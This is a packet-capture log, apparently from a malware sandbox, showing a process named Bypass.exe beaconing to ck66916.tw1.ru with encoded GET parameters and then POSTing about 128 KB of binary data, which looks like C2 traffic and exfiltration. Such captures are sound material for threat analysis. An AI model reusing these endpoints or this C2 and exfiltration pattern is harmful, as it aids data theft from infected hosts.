Jun 23, 2024 06:54:21.035774946 CEST	267	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Sun, 23 Jun 2024 04:54:20 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65 Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49748	92.53.96.121	80	7004	C:\ProgramData\SoftwareDistribution\Bypass.exe

Timestamp	Bytes transferred	Direction	Data
Jun 23, 2024 06:54:22.060933113 CEST	731	OUT	GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIjhzN1kDN5EDOkVTNiVzNwUWN4IWZmBTM1cTO3kjZwEjMzUjZkhjYjJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1 Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: ck66916.tw1.ru Connection: Keep-Alive
Jun 23, 2024 06:54:22.750040054 CEST	267	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Sun, 23 Jun 2024 04:54:22 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4d 7a 45 7a 59 79 51 57 4d 33 63 44 4f 6a 56 6d 4e 33 49 32 4e 34 55 54 5a 35 41 54 4e 6a 4a 6d 5a 6d 4e 44 5a 32 45 47 5a 68 4a 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65 Data Ascii: ==Qf9JiI6ICMzEzYyQWM3cDOjVmN3I2N4UTZ5ATNjJmZmNDZ2EGZhJye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49750	92.53.96.121	80	7004	C:\ProgramData\SoftwareDistribution\Bypass.exe

Timestamp	Bytes transferred	Direction	Data
Jun 23, 2024 06:54:26.072940111 CEST	2201	OUT	GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=d1nIiojIyQGM3ImNjJGOiNDOjJTZ4kjNmZWZ4U2M5ETOiZDOkBjIsISZkdDZjNjN1kDO4YzNzMmNzUGNidDOmRWO4ATM1EjYyEDN3U2YkFzNiojIjZTNiBzNjNWMkBDO0Y2N1YjNwIWZxcDN0UjM2MDM4UjIsIiN3Q2YkRjYxkDZilDNilzN0EmNlZzNkJGO5MjYjZWZ0ATYlZWMwYmNiojI5YDN4EDNxAzMiBjMlZTO0UzYwMWYlhDNjVWZwMGMjhjI7xSfiElZx8maJBjVzIGbxcVYVJEWaxGeyUVa3lWSuVzVhdnVXp1cOxWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETpRzVkNlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJ [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: ck66916.tw1.ru
Jun 23, 2024 06:54:26.761868000 CEST	267	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Sun, 23 Jun 2024 04:54:26 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65 Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye
Jun 23, 2024 06:54:26.974541903 CEST	267	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Sun, 23 Jun 2024 04:54:26 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65 Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49751	92.53.96.121	80	7004	C:\ProgramData\SoftwareDistribution\Bypass.exe

Timestamp	Bytes transferred	Direction	Data
Jun 23, 2024 06:54:31.777179003 CEST	2201	OUT	GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=d1nIiojIyQGM3ImNjJGOiNDOjJTZ4kjNmZWZ4U2M5ETOiZDOkBjIsISZkdDZjNjN1kDO4YzNzMmNzUGNidDOmRWO4ATM1EjYyEDN3U2YkFzNiojIjZTNiBzNjNWMkBDO0Y2N1YjNwIWZxcDN0UjM2MDM4UjIsIiN3Q2YkRjYxkDZilDNilzN0EmNlZzNkJGO5MjYjZWZ0ATYlZWMwYmNiojI5YDN4EDNxAzMiBjMlZTO0UzYwMWYlhDNjVWZwMGMjhjI7xSfiElZx8maJBjVzIGbxcVYVJEWaxGeyUVa3lWSuVzVhdnVXp1cOxWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETpRzVkNlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJ [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: ck66916.tw1.ru
Jun 23, 2024 06:54:32.470726013 CEST	267	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Sun, 23 Jun 2024 04:54:32 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65 Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49752	92.53.96.121	80	7004	C:\ProgramData\SoftwareDistribution\Bypass.exe

Timestamp	Bytes transferred	Direction	Data
Jun 23, 2024 06:54:37.480432987 CEST	2247	OUT	GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZ [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: ck66916.tw1.ru Connection: Keep-Alive
Jun 23, 2024 06:54:38.176522970 CEST	267	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Sun, 23 Jun 2024 04:54:38 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65 Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49753	92.53.96.121	80	7004	C:\ProgramData\SoftwareDistribution\Bypass.exe

Timestamp	Bytes transferred	Direction	Data
Jun 23, 2024 06:54:43.198962927 CEST	2247	OUT	GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZ [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: ck66916.tw1.ru Connection: Keep-Alive
Jun 23, 2024 06:54:43.926820993 CEST	267	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Sun, 23 Jun 2024 04:54:43 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65 Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49754	92.53.96.121	80	7004	C:\ProgramData\SoftwareDistribution\Bypass.exe

Timestamp	Bytes transferred	Direction	Data
Jun 23, 2024 06:54:45.074774027 CEST	785	OUT	GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&1ee1ab9261adb8cfddd516f369c274e1=QX9JSUNJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjhzN1kDN5EDOkVTNiVzNwUWN4IWZmBTM1cTO3kjZwEjMzUjZkhjYjJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1 Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: ck66916.tw1.ru Connection: Keep-Alive
Jun 23, 2024 06:54:45.786645889 CEST	161	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Sun, 23 Jun 2024 04:54:45 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Jun 23, 2024 06:54:45.792171955 CEST	579	OUT	POST /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ HTTP/1.1 Content-Type: multipart/form-data; boundary=----------WebKitFormBoundaryCZvrRLBBKVwcdizJ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 Host: ck66916.tw1.ru Content-Length: 127919 Expect: 100-continue
Jun 23, 2024 06:54:46.008459091 CEST	25	IN	HTTP/1.1 100 Continue
Jun 23, 2024 06:54:46.008867979 CEST	13596	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 43 5a 76 72 52 4c 42 42 4b 56 77 63 64 69 7a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 Data Ascii: ------------WebKitFormBoundaryCZvrRLBBKVwcdizJContent-Disposition: form-data; name="e7a5a92d3412b83d77ff1a5a60f15f1f"jVmMkRmN1ITNklzN5UmM3czY4Y2YlBzNkJTYzImY3gjY5YzYjBjYl1iN3Q2YkRjYxkDZilDNilzN0EmNlZzNkJGO5MjYjZWZ0ATYlZWMwYmN----------
Jun 23, 2024 06:54:46.013925076 CEST	2472	OUT	Data Raw: 65 6a 09 92 16 b6 d4 b6 dd 61 de 03 7c 16 b7 43 7d 8a 6c 9b 83 3d 05 e2 83 6e de 07 05 91 aa f8 9b 9a cd e0 d7 9b 9a 2b 1a 39 af 6a cf a1 fc 99 14 a5 df 84 33 f2 1b e3 7e 54 51 08 74 a5 0d 48 a0 1b 95 49 24 04 19 e0 d0 3d 16 eb 09 84 1e d9 e6 25 Data Ascii: eja\|C}l=n+9j3~TQtHI$=%.V#[epGMgoKT}7SKE}V['.{adO^fQ;rPOFXxTE<Nb\riQeuF=S
Jun 23, 2024 06:54:46.013950109 CEST	4944	OUT	Data Raw: bd f0 09 06 b8 6f 32 36 bb 18 53 ef 3a a0 4d 8a b4 2f 3b 92 dc ae fd f3 e6 c9 83 e6 58 86 36 9f 15 62 a9 5a 54 51 47 6b 2c 70 76 08 bb e5 e9 20 f6 ad 4c 2c 75 61 6e eb 77 e8 f7 3b 0f b9 20 4e c8 72 f1 f2 13 3b 5f 8b ba ba 27 bb 66 e7 5f 88 14 cd Data Ascii: o26S:M/;X6bZTQGk,pv L,uanw; Nr;_'f_{E1-(Oo!Qyq0~>YD)7g}B2`ascf'i4FJj4\}r6xhuHp{~L1:(-2)C%7,
Jun 23, 2024 06:54:46.013979912 CEST	2472	OUT	Data Raw: f6 20 c7 cb 6c b6 06 3b 66 1b 39 cc 0f bc da 84 f8 f9 4a b2 1a b4 a3 d3 65 60 86 69 7b 7f e2 59 ef c6 94 6b 61 2e 0b 26 17 43 35 ac dd fe 5c eb b1 37 f1 0b 31 c8 37 d6 72 fd a7 fd 86 8a 10 83 ec 24 11 d3 a8 eb e6 4c 9c f8 34 51 9e 8e d1 93 46 dc Data Ascii: l;f9Je`i{Yka.&C5\717r$L4QFNi9q W0ttFHh`zb\9jvbGz!)\+j:`]:?J?jK}+$C%QZe)M90c4s<^3RJ
Jun 23, 2024 06:54:46.013999939 CEST	4944	OUT	Data Raw: e8 ec c4 f0 e8 14 b8 fd ab 52 c5 a6 c2 4f e2 18 91 74 9b 93 46 17 88 58 0e 88 8f cf 89 4d 6e 10 d3 27 c6 3a d2 1c 0f 17 28 7e 41 8b 18 3f f4 91 44 8c 49 8a 78 14 c4 98 b5 4c 1e 92 7e 78 04 e5 e5 76 2d 2c 1f 86 c1 1c 06 23 98 bf 36 1c f5 51 0d 26 Data Ascii: ROtFXMn':(~A?DIxL~xv-,#6Q&w}2lF#~?\|zh<K@e*q]j@ v3hAK,5Jrzo94BR>K^`Z@dz`Vu>amgiQvH-{Sj)
Jun 23, 2024 06:54:46.014019012 CEST	2472	OUT	Data Raw: 24 f1 ff 04 42 d8 f8 d3 d3 81 94 54 9d 4c c1 41 a4 74 4b 72 8d d1 22 85 3e 08 d8 91 98 13 75 b0 58 3d 32 24 a9 10 48 f2 7e 39 47 4c b6 44 f0 75 92 bf bd b3 92 40 f1 4d cc a8 66 b1 8a ac e4 d3 9b 4f 46 67 b3 e4 9c 81 19 cc 43 a0 4d 77 52 48 b6 a5 Data Ascii: $BTLAtKr">uX=2$H~9GLDu@MfOFgCMwRHc'&;A5()e%"rPafwo#m[iSe$o=}eAj\|y1+\|jQB4eD*PC/p`k>dSZD7e2TO?
Jun 23, 2024 06:54:46.014058113 CEST	2472	OUT	Data Raw: 34 8e dd b1 e2 7c 38 de 2e 63 5e a7 09 0c 99 47 0a 5f b9 14 09 87 e8 e2 78 e5 e6 87 85 6f 17 5b 06 66 a5 d8 29 2f d0 95 6a 46 c6 27 ff cc 9a 36 7f d9 e4 6f dd 63 af b6 40 6b 3a 84 63 77 aa 7c a7 61 6f 1e 00 a7 9e 32 8c 63 9d fc c0 a9 61 13 55 d4 Data Ascii: 4\|8.c^G_xo[f)/jF'6oc@k:cw\|ao2caUc}gJ6b^)-KP{/Gp3'@},sn`}"'-&b(n/ <[l]2'&D=+fd.FL;CZuVj\mb=!h<9:ms-`\>E
Jun 23, 2024 06:54:46.014074087 CEST	2472	OUT	Data Raw: a8 f6 36 72 35 dd a4 9a 98 c8 27 7e 97 9b 95 43 70 0f ad 94 fd bd ed e4 6a 12 8d 74 dd 45 29 fc c7 d2 1e 3e 91 f9 44 fb a9 4c 72 a4 5c 6e 23 dd a9 b2 ac ef 0a ac aa c7 4e 53 c9 dd 33 4f 29 af e5 9c 4b dd 43 28 32 78 23 60 b8 e4 c7 e2 b2 60 e3 74 Data Ascii: 6r5'~CpjtE)>DLr\n#NS3O)KC(2x#``t7\piuR..rp$+pN`pfJ?%i\|?I#^G^8%RYDy~9lZlr<$\jyvd1*"<{<n"9d<sf
Jun 23, 2024 06:54:46.014087915 CEST	2472	OUT	Data Raw: 46 78 4e 9c 8e 58 6a 5f e8 6b b8 02 5a a4 bb 4d 2c d5 00 4c cb 4d 82 d0 73 60 d3 e8 23 01 13 3b ba 4d 94 58 2d 01 d8 df 4c ee f8 a3 d7 c2 90 e2 a1 23 99 33 19 d5 84 8e 0f ed ea 49 8f 67 4c 1f 4b e0 53 d2 d3 7b b7 b3 08 05 2f 6a b3 e1 59 19 8b fb Data Ascii: FxNXj_kZM,LMs`#;MX-L#3IgLKS{/jYJxPw}^oG#WN7:Br9Y,@Tn y9SP\|kSvL<a0a;%Zq{Eg$}'wj*_Vl
Jun 23, 2024 06:54:46.018560886 CEST	2472	OUT	Data Raw: 57 56 96 be b4 aa 0e ca 39 19 08 9d 29 54 67 a6 6c 49 76 1c 67 f6 4b 93 a2 0f ca 51 43 e9 ea c7 b9 4b 3f 23 a5 0a bb 11 f3 fe 17 fa 45 fc ce 0b e3 ad 74 b6 cd 41 d9 b5 8f d0 6e f7 73 34 90 d0 1b 8f 95 7c d6 f3 c7 1e ea 2f 4c d8 a6 b3 3c 33 d6 72 Data Ascii: WV9)TglIvgKQCK?#EtAns4\|/L<3rhe>l*PCg<;hi{/X\_.[5y)vrf^q{zx%5QFhGwe$U5uhw^ns\|+nh^93n8ezg5K}CU
Jun 23, 2024 06:54:46.629122019 CEST	161	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Sun, 23 Jun 2024 04:54:46 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49755	92.53.96.121	80	7004	C:\ProgramData\SoftwareDistribution\Bypass.exe

Timestamp	Bytes transferred	Direction	Data
Jun 23, 2024 06:54:48.949148893 CEST	2247	OUT	GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpR